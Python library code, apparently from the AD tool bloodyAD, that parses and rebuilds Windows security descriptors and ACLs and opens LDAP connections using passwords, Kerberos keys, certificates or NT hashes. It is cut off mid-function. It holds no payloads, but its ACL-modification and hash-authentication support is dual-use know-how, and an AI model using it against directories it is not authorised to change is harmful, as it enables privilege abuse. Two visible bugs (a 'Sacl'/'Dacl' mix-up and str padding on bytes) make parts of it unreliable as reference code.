# Impacket - Collection of Python classes for working with network protocols.
#
# Copyright (C) 2022 Fortra. All rights reserved.
#
# This software is provided under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# Description:
#   Structures and types used in LDAP
#   Contains the Structures for the NT Security Descriptor (non-RPC format) and
#   all ACL related structures
#
# Author:
#   Dirk-jan Mollema (@_dirkjan) / Fox-IT (https://www.fox-it.com)
#
from bloodyAD.formatters.structure import Structure
from struct import unpack, pack

# Global constant if the library should recalculate ACE sizes in objects that are decoded/re-encoded.
# This defaults to True, but this causes the ACLs to not match on a binary level
# since Active Directory for some reason sometimes adds null bytes to the end of ACEs.
# This is valid according to the spec (see 2.4.4), but since impacket encodes them more efficiently
# this should be turned off if running unit tests.
RECALC_ACE_SIZE = True


# LDAP SID structure - based on SAMR_RPC_SID, except the SubAuthority is LE here
class LDAP_SID_IDENTIFIER_AUTHORITY(Structure):
    structure = (("Value", "6s"),)


class LDAP_SID(Structure):
    structure = (
        ("Revision", "<B"),
        ("SubAuthorityCount", "<B"),
        ("IdentifierAuthority", ":", LDAP_SID_IDENTIFIER_AUTHORITY),
        ("SubLen", "_-SubAuthority", 'self["SubAuthorityCount"]*4'),
        ("SubAuthority", ":"),
    )

    def formatCanonical(self):
        ans = "S-%d-%d" % (
            self["Revision"],
            ord(self["IdentifierAuthority"]["Value"][5:6]),
        )
        for i in range(self["SubAuthorityCount"]):
            ans += "-%d" % (unpack("<L", self["SubAuthority"][i * 4 : i * 4 + 4])[0])
        return ans

    def fromCanonical(self, canonical):
        items = canonical.split("-")
        self["Revision"] = int(items[1])
        self["IdentifierAuthority"] = LDAP_SID_IDENTIFIER_AUTHORITY()
        self["IdentifierAuthority"]["Value"] = b"\x00\x00\x00\x00\x00" + pack(
            "B", int(items[2])
        )
        self["SubAuthorityCount"] = len(items) - 3
        self["SubAuthority"] = b""
        for i in range(self["SubAuthorityCount"]):
            self["SubAuthority"] += pack("<L", int(items[i + 3]))


"""
Self-relative security descriptor as described in 2.4.6
https://msdn.microsoft.com/en-us/library/cc230366.aspx
"""


class SR_SECURITY_DESCRIPTOR(Structure):
    structure = (
        ("Revision", "c"),
        ("Sbz1", "c"),
        ("Control", "<H"),
        ("OffsetOwner", "<L"),
        ("OffsetGroup", "<L"),
        ("OffsetSacl", "<L"),
        ("OffsetDacl", "<L"),
        ("Sacl", ":"),
        ("Dacl", ":"),
        ("OwnerSid", ":"),
        ("GroupSid", ":"),
    )

    def fromString(self, data):
        Structure.fromString(self, data)
        # All these fields are optional, if the offset is 0 they are empty
        # there are also flags indicating if they are present
        # TODO: parse those if it adds value
        if self["OffsetOwner"] != 0:
            self["OwnerSid"] = LDAP_SID(data=data[self["OffsetOwner"] :])
        else:
            self["OwnerSid"] = b""

        if self["OffsetGroup"] != 0:
            self["GroupSid"] = LDAP_SID(data=data[self["OffsetGroup"] :])
        else:
            self["GroupSid"] = b""

        if self["OffsetSacl"] != 0:
            self["Sacl"] = ACL(data=data[self["OffsetSacl"] :])
        else:
            self["Sacl"] = b""

        if self["OffsetDacl"] != 0:
            self["Dacl"] = ACL(data=data[self["OffsetDacl"] :])
        else:
            self["Sacl"] = b""

    def getData(self):
        headerlen = 20
        # Reconstruct the security descriptor
        # flags are currently not set automatically
        # TODO: do this?
        datalen = 0
        if self["Sacl"] != b"":
            self["OffsetSacl"] = headerlen + datalen
            datalen += len(self["Sacl"].getData())
        else:
            self["OffsetSacl"] = 0

        if self["Dacl"] != b"":
            self["OffsetDacl"] = headerlen + datalen
            datalen += len(self["Dacl"].getData())
        else:
            self["OffsetDacl"] = 0

        if self["OwnerSid"] != b"":
            self["OffsetOwner"] = headerlen + datalen
            datalen += len(self["OwnerSid"].getData())
        else:
            self["OffsetOwner"] = 0

        if self["GroupSid"] != b"":
            self["OffsetGroup"] = headerlen + datalen
            datalen += len(self["GroupSid"].getData())
        else:
            self["OffsetGroup"] = 0
        return Structure.getData(self)


"""
ACE as described in 2.4.4
https://msdn.microsoft.com/en-us/library/cc230295.aspx
"""


class ACE(Structure):
    # Flag constants
    CONTAINER_INHERIT_ACE = 0x02
    FAILED_ACCESS_ACE_FLAG = 0x80
    INHERIT_ONLY_ACE = 0x08
    INHERITED_ACE = 0x10
    NO_PROPAGATE_INHERIT_ACE = 0x04
    OBJECT_INHERIT_ACE = 0x01
    SUCCESSFUL_ACCESS_ACE_FLAG = 0x40

    structure = (
        #
        # ACE_HEADER as described in 2.4.4.1
        # https://msdn.microsoft.com/en-us/library/cc230296.aspx
        #
        ("AceType", "B"),
        ("AceFlags", "B"),
        ("AceSize", "<H"),
        # Virtual field to calculate data length from AceSize
        ("AceLen", "_-Ace", 'self["AceSize"]-4'),
        #
        # ACE body, is parsed depending on the type
        #
        ("Ace", ":"),
    )

    def fromString(self, data):
        # This will parse the header
        Structure.fromString(self, data)
        # Now we parse the ACE body according to its type
        self["TypeName"] = ACE_TYPE_MAP[self["AceType"]].__name__
        self["Ace"] = ACE_TYPE_MAP[self["AceType"]](data=self["Ace"])

    def getData(self):
        if RECALC_ACE_SIZE or "AceSize" not in self.fields:
            self["AceSize"] = (
                len(self["Ace"].getData()) + 4
            )  # Header size (4 bytes) is included
        if self["AceSize"] % 4 != 0:
            # Make sure the alignment is correct
            self["AceSize"] += self["AceSize"] % 4
        data = Structure.getData(self)
        # For some reason ACEs are sometimes longer than they need to be
        # we fill this space up with null bytes to make sure the object
        # we create is identical to the original object
        if len(data) < self["AceSize"]:
            data += "\x00" * (self["AceSize"] - len(data))
        return data

    def hasFlag(self, flag):
        return self["AceFlags"] & flag == flag


"""
ACCESS_MASK as described in 2.4.3
https://msdn.microsoft.com/en-us/library/cc230294.aspx
"""


class ACCESS_MASK(Structure):
    # Flag constants
    GENERIC_READ = 0x80000000
    GENERIC_WRITE = 0x40000000
    GENERIC_EXECUTE = 0x20000000
    GENERIC_ALL = 0x10000000
    MAXIMUM_ALLOWED = 0x02000000
    ACCESS_SYSTEM_SECURITY = 0x01000000
    SYNCHRONIZE = 0x00100000
    WRITE_OWNER = 0x00080000
    WRITE_DACL = 0x00040000
    READ_CONTROL = 0x00020000
    DELETE = 0x00010000

    structure = (("Mask", "<L"),)

    def hasPriv(self, priv):
        return self["Mask"] & priv == priv

    def setPriv(self, priv):
        self["Mask"] |= priv

    def removePriv(self, priv):
        self["Mask"] ^= priv


"""
ACCESS_ALLOWED_ACE as described in 2.4.4.2
https://msdn.microsoft.com/en-us/library/cc230286.aspx
"""


class ACCESS_ALLOWED_ACE(Structure):
    ACE_TYPE = 0x00
    structure = (("Mask", ":", ACCESS_MASK), ("Sid", ":", LDAP_SID))


"""
ACCESS_ALLOWED_OBJECT_ACE as described in 2.4.4.3
https://msdn.microsoft.com/en-us/library/cc230289.aspx
"""


class ACCESS_ALLOWED_OBJECT_ACE(Structure):
    ACE_TYPE = 0x05

    # Flag contstants
    ACE_OBJECT_TYPE_PRESENT = 0x01
    ACE_INHERITED_OBJECT_TYPE_PRESENT = 0x02

    # ACE type specific mask constants
    # Note that while not documented, these also seem valid
    # for ACCESS_ALLOWED_ACE types
    ADS_RIGHT_DS_CONTROL_ACCESS = 0x00000100
    ADS_RIGHT_DS_CREATE_CHILD = 0x00000001
    ADS_RIGHT_DS_DELETE_CHILD = 0x00000002
    ADS_RIGHT_DS_READ_PROP = 0x00000010
    ADS_RIGHT_DS_WRITE_PROP = 0x00000020
    ADS_RIGHT_DS_SELF = 0x00000008

    structure = (
        ("Mask", ":", ACCESS_MASK),
        ("Flags", "<L"),
        # Optional field
        ("ObjectTypeLen", "_-ObjectType", 'self.checkObjectType(self["Flags"])'),
        ("ObjectType", ':=""'),
        # Optional field
        (
            "InheritedObjectTypeLen",
            "_-InheritedObjectType",
            'self.checkInheritedObjectType(self["Flags"])',
        ),
        ("InheritedObjectType", ':=""'),
        ("Sid", ":", LDAP_SID),
    )

    @staticmethod
    def checkInheritedObjectType(flags):
        if flags & ACCESS_ALLOWED_OBJECT_ACE.ACE_INHERITED_OBJECT_TYPE_PRESENT:
            return 16
        return 0

    @staticmethod
    def checkObjectType(flags):
        if flags & ACCESS_ALLOWED_OBJECT_ACE.ACE_OBJECT_TYPE_PRESENT:
            return 16
        return 0

    def getData(self):
        # Set the correct flags
        if self["ObjectType"] != b"":
            self["Flags"] |= self.ACE_OBJECT_TYPE_PRESENT
        if self["InheritedObjectType"] != b"":
            self["Flags"] |= self.ACE_INHERITED_OBJECT_TYPE_PRESENT
        return Structure.getData(self)

    def hasFlag(self, flag):
        return self["Flags"] & flag == flag


"""
ACCESS_DENIED_ACE as described in 2.4.4.4
https://msdn.microsoft.com/en-us/library/cc230291.aspx
Structure is identical to ACCESS_ALLOWED_ACE
"""


class ACCESS_DENIED_ACE(ACCESS_ALLOWED_ACE):
    ACE_TYPE = 0x01


"""
ACCESS_DENIED_OBJECT_ACE as described in 2.4.4.5
https://msdn.microsoft.com/en-us/library/gg750297.aspx
Structure is identical to ACCESS_ALLOWED_OBJECT_ACE
"""


class ACCESS_DENIED_OBJECT_ACE(ACCESS_ALLOWED_OBJECT_ACE):
    ACE_TYPE = 0x06


"""
ACCESS_ALLOWED_CALLBACK_ACE as described in 2.4.4.6
https://msdn.microsoft.com/en-us/library/cc230287.aspx
"""


class ACCESS_ALLOWED_CALLBACK_ACE(Structure):
    ACE_TYPE = 0x09
    structure = (
        ("Mask", ":", ACCESS_MASK),
        ("Sid", ":", LDAP_SID),
        ("ApplicationData", ":"),
    )


"""
ACCESS_DENIED_OBJECT_ACE as described in 2.4.4.7
https://msdn.microsoft.com/en-us/library/cc230292.aspx
Structure is identical to ACCESS_ALLOWED_CALLBACK_ACE
"""


class ACCESS_DENIED_CALLBACK_ACE(ACCESS_ALLOWED_CALLBACK_ACE):
    ACE_TYPE = 0x0A


"""
ACCESS_ALLOWED_CALLBACK_OBJECT_ACE as described in 2.4.4.8
https://msdn.microsoft.com/en-us/library/cc230288.aspx
"""


class ACCESS_ALLOWED_CALLBACK_OBJECT_ACE(ACCESS_ALLOWED_OBJECT_ACE):
    ACE_TYPE = 0x0B
    structure = (
        ("Mask", ":", ACCESS_MASK),
        ("Flags", "<L"),
        # Optional field
        ("ObjectTypeLen", "_-ObjectType", 'self.checkObjectType(self["Flags"])'),
        ("ObjectType", ':=""'),
        # Optional field
        (
            "InheritedObjectTypeLen",
            "_-InheritedObjectType",
            'self.checkInheritedObjectType(self["Flags"])',
        ),
        ("InheritedObjectType", ':=""'),
        ("Sid", ":", LDAP_SID),
        ("ApplicationData", ":"),
    )


"""
ACCESS_DENIED_CALLBACK_OBJECT_ACE as described in 2.4.4.7
https://msdn.microsoft.com/en-us/library/cc230292.aspx
Structure is identical to ACCESS_ALLOWED_OBJECT_OBJECT_ACE
"""


class ACCESS_DENIED_CALLBACK_OBJECT_ACE(ACCESS_ALLOWED_CALLBACK_OBJECT_ACE):
    ACE_TYPE = 0x0C


"""
SYSTEM_AUDIT_ACE as described in 2.4.4.10
https://msdn.microsoft.com/en-us/library/cc230376.aspx
Structure is identical to ACCESS_ALLOWED_ACE
"""


class SYSTEM_AUDIT_ACE(ACCESS_ALLOWED_ACE):
    ACE_TYPE = 0x02


"""
SYSTEM_AUDIT_OBJECT_ACE as described in 2.4.4.11
https://msdn.microsoft.com/en-us/library/gg750298.aspx
Structure is identical to ACCESS_ALLOWED_CALLBACK_OBJECT_ACE
"""


class SYSTEM_AUDIT_OBJECT_ACE(ACCESS_ALLOWED_CALLBACK_OBJECT_ACE):
    ACE_TYPE = 0x07


"""
SYSTEM_AUDIT_CALLBACK_ACE as described in 2.4.4.12
https://msdn.microsoft.com/en-us/library/cc230377.aspx
Structure is identical to ACCESS_ALLOWED_CALLBACK_ACE
"""


class SYSTEM_AUDIT_CALLBACK_ACE(ACCESS_ALLOWED_CALLBACK_ACE):
    ACE_TYPE = 0x0D


"""
SYSTEM_AUDIT_CALLBACK_ACE as described in 2.4.4.13
https://msdn.microsoft.com/en-us/library/cc230379.aspx
Structure is identical to ACCESS_ALLOWED_ACE, but with custom masks and meanings.
Lets keep it separate for now
"""


class SYSTEM_MANDATORY_LABEL_ACE(Structure):
    ACE_TYPE = 0x11
    structure = (("Mask", ":", ACCESS_MASK), ("Sid", ":", LDAP_SID))


"""
SYSTEM_AUDIT_CALLBACK_ACE as described in 2.4.4.14
https://msdn.microsoft.com/en-us/library/cc230378.aspx
Structure is identical to ACCESS_ALLOWED_CALLBACK_OBJECT_ACE
"""


class SYSTEM_AUDIT_CALLBACK_OBJECT_ACE(ACCESS_ALLOWED_CALLBACK_OBJECT_ACE):
    ACE_TYPE = 0x0F


"""
SYSTEM_RESOURCE_ATTRIBUTE_ACE as described in 2.4.4.15
https://msdn.microsoft.com/en-us/library/hh877837.aspx
Structure is identical to ACCESS_ALLOWED_CALLBACK_ACE
The application data however is encoded in CLAIM_SECURITY_ATTRIBUTE_RELATIVE_V1
format as described in section 2.4.10.1
Todo: implement this substructure if needed
"""


class SYSTEM_RESOURCE_ATTRIBUTE_ACE(ACCESS_ALLOWED_CALLBACK_ACE):
    ACE_TYPE = 0x12


"""
SYSTEM_SCOPED_POLICY_ID_ACE as described in 2.4.4.16
https://msdn.microsoft.com/en-us/library/hh877846.aspx
Structure is identical to ACCESS_ALLOWED_ACE
The Sid data MUST match a CAPID of a CentralAccessPolicy
contained in the CentralAccessPoliciesList
Todo: implement this substructure if needed
Also the ACCESS_MASK must always be 0
"""


class SYSTEM_SCOPED_POLICY_ID_ACE(ACCESS_ALLOWED_ACE):
    ACE_TYPE = 0x13


# All the ACE types in a list
ACE_TYPES = [
    ACCESS_ALLOWED_ACE,
    ACCESS_ALLOWED_OBJECT_ACE,
    ACCESS_DENIED_ACE,
    ACCESS_DENIED_OBJECT_ACE,
    ACCESS_ALLOWED_CALLBACK_ACE,
    ACCESS_DENIED_CALLBACK_ACE,
    ACCESS_ALLOWED_CALLBACK_OBJECT_ACE,
    ACCESS_DENIED_CALLBACK_OBJECT_ACE,
    SYSTEM_AUDIT_ACE,
    SYSTEM_AUDIT_OBJECT_ACE,
    SYSTEM_AUDIT_CALLBACK_ACE,
    SYSTEM_MANDATORY_LABEL_ACE,
    SYSTEM_AUDIT_CALLBACK_OBJECT_ACE,
    SYSTEM_RESOURCE_ATTRIBUTE_ACE,
    SYSTEM_SCOPED_POLICY_ID_ACE,
]

# A dict of all the ACE types indexed by their type number
ACE_TYPE_MAP = {ace.ACE_TYPE: ace for ace in ACE_TYPES}

"""
ACL as described in 2.4.5
https://msdn.microsoft.com/en-us/library/cc230297.aspx
"""


class ACL(Structure):
    structure = (
        ("AclRevision", "B"),
        ("Sbz1", "B"),
        ("AclSize", "<H"),
        ("AceCount", "<H"),
        ("Sbz2", "<H"),
        # Virtual field to calculate data length from AclSize
        ("DataLen", "_-Data", 'self["AclSize"]-8'),
        ("Data", ":"),
    )

    def fromString(self, data):
        self.aces = []
        Structure.fromString(self, data)
        for i in range(self["AceCount"]):
            # If we don't have any data left, return
            if len(self["Data"]) == 0:
                raise Exception(
                    "ACL header indicated there are more ACLs to unpack, but there is"
                    " no more data"
                )
            ace = ACE(data=self["Data"])
            self.aces.append(ace)
            self["Data"] = self["Data"][ace["AceSize"] :]
        self["Data"] = self.aces

    def getData(self):
        self["AceCount"] = len(self.aces)
        # We modify the data field to be able to use the
        # parent class parsing
        self["Data"] = b"".join([ace.getData() for ace in self.aces])
        self["AclSize"] = len(self["Data"]) + 8  # Header size (8 bytes) is included
        data = Structure.getData(self)
        # Put the ACEs back in data
        self["Data"] = self.aces
        return data


"""
objectClass mapping to GUID for some common classes (index is the ldapDisplayName).
Reference:
    https://msdn.microsoft.com/en-us/library/ms680938(v=vs.85).aspx
Can also be queried from the Schema
"""
OBJECTTYPE_GUID_MAP = {
    b"group": "bf967a9c-0de6-11d0-a285-00aa003049e2",
    b"domain": "19195a5a-6da0-11d0-afd3-00c04fd930c9",
    b"organizationalUnit": "bf967aa5-0de6-11d0-a285-00aa003049e2",
    b"user": "bf967aba-0de6-11d0-a285-00aa003049e2",
    b"groupPolicyContainer": "f30e3bc2-9ff0-11d1-b603-0000f80367c1",
}



from bloodyAD.formatters import accesscontrol, common
from bloodyAD.exceptions import NoResultError, TooManyResultsError, LOG
import re, os, enum, asyncio, threading, urllib, collections, ssl
from functools import cached_property, lru_cache
from asn1crypto import core
from dns import resolver, rdatatype
from msldap.client import MSLDAPClient
from msldap.commons.factory import LDAPConnectionFactory
from msldap.wintypes.asn1.sdflagsrequest import SDFlagsRequestValue
from winacl import dtyp


class Scope(enum.Enum):
    BASE = 0
    LEVEL = 1
    SUBTREE = 2


class Change(enum.Enum):
    ADD = "add"
    DELETE = "delete"
    REPLACE = "replace"
    INCREMENT = "increment"


class NCType(enum.IntFlag):
    PARTIAL_DOM = 1
    FULL_DOM = 2
    APP = 4
    ALL = PARTIAL_DOM | FULL_DOM | APP


@lru_cache
def phantomRoot():
    # [MS-ADTS] 3.1.1.3.4.1.12
    # Search control to search in all NC replicas except applications replicas (DNS partitions)
    class SearchOptionsRequest(core.Sequence):
        _fields = [
            ("Flags", core.Integer),
        ]

    SERVER_SEARCH_FLAG_PHANTOM_ROOT = 2
    scontrols = SearchOptionsRequest({"Flags": SERVER_SEARCH_FLAG_PHANTOM_ROOT})
    LDAP_SERVER_SEARCH_OPTIONS_OID = "1.2.840.113556.1.4.1340"

    return (LDAP_SERVER_SEARCH_OPTIONS_OID, False, scontrols.dump())


class Ldap(MSLDAPClient):
    conf = None
    domainNC = None
    configNC = None
    # Format: {<AD domain name>:{"conn":<ConnectionHandler obj>, "domsid":<domain sid>}}
    # "conn" is optional
    conn = None
    co_url = None
    dc_domain = None

    def __init__(self, conn):
        self._trustmap = collections.defaultdict(dict)
        self.conn = conn
        cnf = conn.conf
        self.conf = cnf

        # Because msldap uses a url format we have to encode everything properly
        encoded_cnf = {}
        for attr_name, attr_value in vars(cnf).items():
            if type(attr_value) is str:
                encoded_cnf[attr_name] = urllib.parse.quote(attr_value, safe="")
            else:
                encoded_cnf[attr_name] = attr_value

        auth = ""
        creds = ""
        username = ""
        key = ""
        params = "serverip=" + cnf.dcip

        if cnf.kerberos:
            username = "%s\\%s" % (encoded_cnf["domain"], encoded_cnf["username"])
            if cnf.dcip == cnf.host:
                raise ValueError(
                    "You can provide the IP in --dc-ip but you need to provide the"
                    " hostname in --host in order for kerberos to work"
                )
            params += "&dc=" + cnf.kdc
            if cnf.kdcc and cnf.realmc:
                params += f"&dcc={cnf.kdcc}&realmc={cnf.realmc}"
            auth = "kerberos-"
            key = encoded_cnf["key"]
            if cnf.crt:
                file_extension = cnf.crt.rsplit('.',1)[1]
                if file_extension in ["pfx", "p12"]:
                    auth += "pfx"
                elif file_extension == "pem":
                    auth += "pem"
                else:
                    LOG.warning("[!] No .pem/.pfx extension detected, will try .pem")
                    auth += "pem"
                params += "&certdata=" + encoded_cnf["crt"]
                if cnf.key:
                    params += "&keydata=" + key
                    key = ""
                if cnf.password:
                    key = encoded_cnf["password"]
            elif key:
                auth += cnf.krbformat
                if cnf.format in ["b64", "hex"]:
                    auth += cnf.format
            else:
                if cnf.password:
                    if cnf.format in ["aes", "rc4"]:
                        auth += cnf.format
                    else:
                        auth += "password"
                    key = encoded_cnf["password"]
                else:
                    if os.name == "nt":
                        if cnf.certificate:
                            auth += "certstore"
                        else:
                            auth = "sspi-kerberos"
                    else:
                        raise ValueError(
                            "You should provide a -p 'password' or a kerberos ticket"
                            " via '-k <keyfile_type>=./myticket'"
                        )                   
        elif cnf.certificate:
            if cnf.crt:
                auth = "ssl"
                params += "&sslcert=" + encoded_cnf["crt"]
                if cnf.key:
                    params += "&sslkey=" + encoded_cnf["key"]
                if cnf.password:
                    params += "&sslpassword=" + encoded_cnf["password"]
            else:
                if os.name == "nt":
                    auth = "kerberos-certstore"
                else:
                    raise ValueError(
                        "Certstore only available on Windows, --certstore can't be left empty here"
                    )
        else:
            username = "%s\\%s" % (encoded_cnf["domain"], encoded_cnf["username"])
            if cnf.nthash:
                auth = "ntlm-nt"
                key = encoded_cnf["nthash"]
            else:
                key = encoded_cnf["password"]
                if not key:
                    if os.name == "nt":
                        auth = "sspi-ntlm"
                    else:
                        raise ValueError("You should provide a -p 'password'")
                else:
                    auth = "ntlm-pw"
                    if cnf.format in ["b64", "hex"]:
                        auth += cnf.format

        if cnf.timeout:
            params += "&timeout=" + cnf.timeout

        auth = "+" + auth if auth else ""
        creds = username if username else ""
        creds = creds + ":" + key if key else creds
        creds = creds + "@" if creds else ""
        params = "/?" + params
        self.co_url = f"{cnf.scheme}{auth}://{creds}{encoded_cnf['host']}{params}"
        LOG.debug(f"[+] Connection URL: {self.co_url}")
        ldap_factory = LDAPConnectionFactory.from_url(self.co_url)
        super().__init__(ldap_factory.target, ldap_factory.credential, keepalive=True)

        # Connect function runs indefinitely waiting for I/O events so using asyncio.run will not allow us to reuse the connection
        # To avoid it, we launch it in another thread and we control it using a defined event_loop
        self.loop = asyncio.new_event_loop()
        connect_task = self.loop.create_task(self.connect())
        self.thread = threading.Thread(target=self.loop.run_forever)
        self.thread.start()

        # Using an async function to await connect_task because connect_task.result doesn't work
        async def getServerInfo(task):
            return await task

        try:
            LOG.debug(f"[*] Trying to connect to {self.conf.host}...")
            _, err = asyncio.run_coroutine_threadsafe(
                getServerInfo(connect_task), self.loop
            ).result()
            if err:
                raise err
            LOG.debug("[+] Connection successful")
            self.isactive = True
            self.domainNC = self._serverinfo["defaultNamingContext"]
            self.configNC = self._serverinfo["configurationNamingContext"]
            self.schemaNC = self._serverinfo["schemaNamingContext"]
            self.appNCs = []
            for nc in self._serverinfo["namingContexts"]:
                if nc in [self.domainNC, self.configNC, self.schemaNC]:
                    continue
                self.appNCs.append(nc)
            self.dc_domain = ('.'.join(self.domainNC.split(",DC="))).split("DC=")[1]
        except Exception as e:
            self.closeThread()
            raise e

    def bloodyadd(self, target, **kwargs):
        _, err = asyncio.run_coroutine_threadsafe(
            self.add(self.dnResolver(target), **kwargs), self.loop
        ).result()
        if err:
            raise err

    def closeThread(self):
        for task in asyncio.all_tasks(self.loop):
            task.cancel()
        self.loop.call_soon_threadsafe(self.loop.stop)
        self.thread.join(0)

    def close(self):
        if not self.isactive:
            return
        self.isactive = False
        for trust in self._trustmap.values():
            if "conn" in trust and trust["conn"] != self.conn:
                trust["conn"].closeLdap()
        asyncio.run_coroutine_threadsafe(self.disconnect(), self.loop).result()
        self.closeThread()

    def bloodydelete(self, target, *args):
        _, err = asyncio.run_coroutine_threadsafe(
            self.delete(self.dnResolver(target), *args), self.loop
        ).result()
        if err:
            raise err

    @lru_cache
    def dnResolver(self, identity):
        """
        Return the DN for the object based on the parameters identity
        Args:
            identity: sAMAccountName, DN, GPO name or SID of the object
        """

        async def asyncDnResolver(identity):
            if ",dc=" in identity.lower():
                # identity is a DN, return as is
                # We do not try to validate it because it could be from another trusted domain
                return identity

            if identity.lower().startswith("s-1-"):
                # We assume identity is an SID
                ldap_filter = f"(objectSid={identity})"
            # For GPO name as GPO has no sAMAccountName
            elif identity.startswith("{"):
                ldap_filter = (
                    f"(name={identity})"
                )
            else:
                # By default, we assume identity is a sam account name
                ldap_filter = f"(sAMAccountName={identity})"

            dn = ""
            entries = self.pagedsearch(
                ldap_filter, ["distinguishedName"], tree=self.domainNC
            )
            async for entry, err in entries:
                if err:
                    raise err
                if dn:
                    raise TooManyResultsError(self.domainNC, ldap_filter, entries)
                dn = entry["attributes"]["distinguishedName"]

            if not dn:
                # Try ambiguous name resolution as last resort for debug
                entries = self.pagedsearch(
                f"(anr={identity})", ["distinguishedName"], tree=self.domainNC
                )
                anr_dn = []
                async for entry, err in entries:
                    if err:
                        raise err
                    anr_dn.append(entry["attributes"]["distinguishedName"])
                if anr_dn:
                    LOG.error(
                        f"[!] No results found for '{identity}' but found entries that could match: {anr_dn}"
                    )
                raise NoResultError(self.domainNC, ldap_filter)

            return dn

        return asyncio.run_coroutine_threadsafe(
            asyncDnResolver(identity), self.loop
        ).result()

    def bloodymodify(self, target, changes, controls=None, encode=True):
        if controls is not None:
            t = []
            for control in controls:
                t.append(
                    {
                        "controlType": control[0].encode(),
                        "criticality": control[1],
                        "controlValue": control[2],
                    }
                )
            controls = t

        _, err = asyncio.run_coroutine_threadsafe(
            self.modify(self.dnResolver(target), changes, controls, encode=encode),
            self.loop,
        ).result()
        if err:
            raise err

    @cached_property
    def current_site(self):
        return (self._serverinfo["serverName"].rsplit(",CN=Sites")[0]).split(
            ",CN=Servers,CN="
        )[1]

    @cached_property
    def is_gc(self):
        # If we are in a gc connection we don't have the options attribute but we can check the scheme of our connection
        if self.conf.scheme == "gc":
            return True

        NTDSDSA_OPT_IS_GC = 1
        # Sometimes raise an error, I don't know why, maybe race condition?
        nTDSDSA_options = next(
            self.bloodysearch(self._serverinfo["dsServiceName"], attr=["options"])
        )["options"]
        return nTDSDSA_options & NTDSDSA_OPT_IS_GC

    @cached_property
    def policy(self):
        """
        [MS-ADTS] - 3.1.1.3.4.6 LDAP Policies
        """

        async def asyncPolicy():
            dict_policy = {"MaxPageSize": 1000}

            nTDSDSA_dn = self._serverinfo["dsServiceName"]
            site_match = re.search("[^,]+,CN=Sites.+", nTDSDSA_dn)
            nTDSSiteSettings_filter = ""
            if site_match:
                nTDSSiteSettings_dn = "CN=NTDS Site Settings," + site_match.group()
                nTDSSiteSettings_filter = f"(distinguishedName={nTDSSiteSettings_dn})"
            default_policy_dn = (
                "CN=Default Query Policy,CN=Query-Policies,CN=Directory"
                " Service,CN=Windows NT,CN=Services," + self.configNC
            )
            ldap_filter = f"(|(distinguishedName={nTDSDSA_dn}){nTDSSiteSettings_filter}(distinguishedName={default_policy_dn}))"
            raw_policy = ""

            async for entry, err in self.pagedsearch(
                ldap_filter, ["lDAPAdminLimits"], tree=self.configNC
            ):
                if err:
                    raise err

                if "lDAPAdminLimits" not in entry:
                    continue
                if entry["objectName"] == nTDSDSA_dn:
                    raw_policy = entry["attributes"]["lDAPAdminLimits"]
                    break
                elif entry["objectName"] == nTDSSiteSettings_dn:
                    raw_policy = entry["attributes"]["lDAPAdminLimits"]
                elif not raw_policy and entry["objectName"] == default_policy_dn:
                    raw_policy = entry["attributes"]["lDAPAdminLimits"]

            for raw_param in raw_policy:
                param_name, _, param_val = raw_param.partition("=")
                dict_policy[param_name] = int(param_val)

            return dict_policy

        return asyncio.run_coroutine_threadsafe(asyncPolicy(), self.loop).result()

    def getTrustMap(self, nctype=NCType.ALL):
        if self._trustmap and (self._nctype & nctype) == nctype:
            return self._trustmap
        asyncio.get_event_loop().run_until_complete(
            self.getTrusts(
                transitive=True,
                dns=self.conf.dns,
                allow_gc=(nctype == NCType.PARTIAL_DOM),
            )
        )
        return self._trustmap

    async def interTrustOp(self, partition_map, op_params, op_name="bloodysearch"):
        async def partitionOp(conn_list):
            for conn in conn_list:
                try:
                    op_fn = getattr(conn.ldap, op_name)
                    return op_fn(op_params)
                except Exception as e:
                    LOG.error(
                        f"[!] Something went wrong when trying to perform '{op_name}' with '{op_params}' on {conn.conf.host} with the {conn.conf.scheme} protocol"
                    )
                    LOG.error(f"[!] Error {type(e).__name__}: {e}")

        tasks = []
        for pattr in partition_map.values():
            tasks.append(partitionOp(pattr["conn_list"]))
        op_results = await asyncio.gather(*tasks)
        return op_results

    def bloodysearch(
        self,
        base,
        ldap_filter="(objectClass=*)",
        search_scope=Scope.BASE,
        attr=None,
        control_flag=(
            accesscontrol.OWNER_SECURITY_INFORMATION
            + accesscontrol.GROUP_SECURITY_INFORMATION
            + accesscontrol.DACL_SECURITY_INFORMATION
        ),
        controls=None,
        raw=False,
    ):
        # Handles corner case where querying default partitions (no dn provided for that)
        if base:
            base_dn = self.dnResolver(base)
        else:
            base_dn = base

        if attr is None:
            attr = ["*"]

        if control_flag:
            # Search control to request security descriptor parts
            req_flags = SDFlagsRequestValue({"Flags": control_flag})
            if controls is None:
                controls = []
            controls.append(("1.2.840.113556.1.4.801", True, req_flags.dump()))

        self.ldap_query_page_size = self.policy["MaxPageSize"]
        search_generator = self.pagedsearch(
            ldap_filter,
            attr,
            tree=base_dn,
            search_scope=search_scope.value,
            controls=controls,
            raw=raw,
        )

        isNul = True
        try:
            while True:
                entry, err = asyncio.run_coroutine_threadsafe(
                    search_generator.__anext__(), self.loop
                ).result()
                if err:
                    raise err
                isNul = False
                yield {
                    **{"distinguishedName": entry["objectName"]},
                    **entry["attributes"],
                }
        except StopAsyncIteration:
            pass
        finally:
            asyncio.run_coroutine_threadsafe(
                search_generator.aclose(), self.loop
            ).result()
        if isNul:
            raise NoResultError(base_dn, ldap_filter)

    async def getTrusts(self, transitive=False, dns="", allow_gc=True):
        # forest_name = ""
        # forest_name = (
        #     ".".join(conn.ldap._serverinfo["rootDomainNamingContext"].split(",DC="))
        # ).split("DC=")[1]

        # We shouldn't need to make trust_dict async_safe cause there is no call to trust_dict before an await access it in fetchTrusts()
        trust_dict = {}
        trust_to_explore = await self.fetchTrusts(
            self.conn, trust_dict, dns, allow_gc=allow_gc
        )

        # We don't do it on foreign trust because there is no transitivity between 3 forests (A<->B<->C) A doesn't have trust on C even if B has it
        if transitive:
            if not self.conf.domain:
                LOG.warning(
                    "[!] No domain (-d, --domain) provided, transitive trust search will not be"
                    " performed"
                )
            elif self.conf.domain not in trust_dict:
                LOG.warning(
                    "[!] User doesn't belong to this forest, transitive trust search will not be"
                    " performed"
                )
            else:
                LOG.info(
                    "[+] Forest trusts fetched, performing transitive trust search"
                )
                tasks = []
                for domain_name, parent_conn in trust_to_explore.items():
                    tasks.append(
                        self.fetchTrusts(
                            parent_conn, trust_dict, dns, domain_name, allow_gc=allow_gc
                        )
                    )
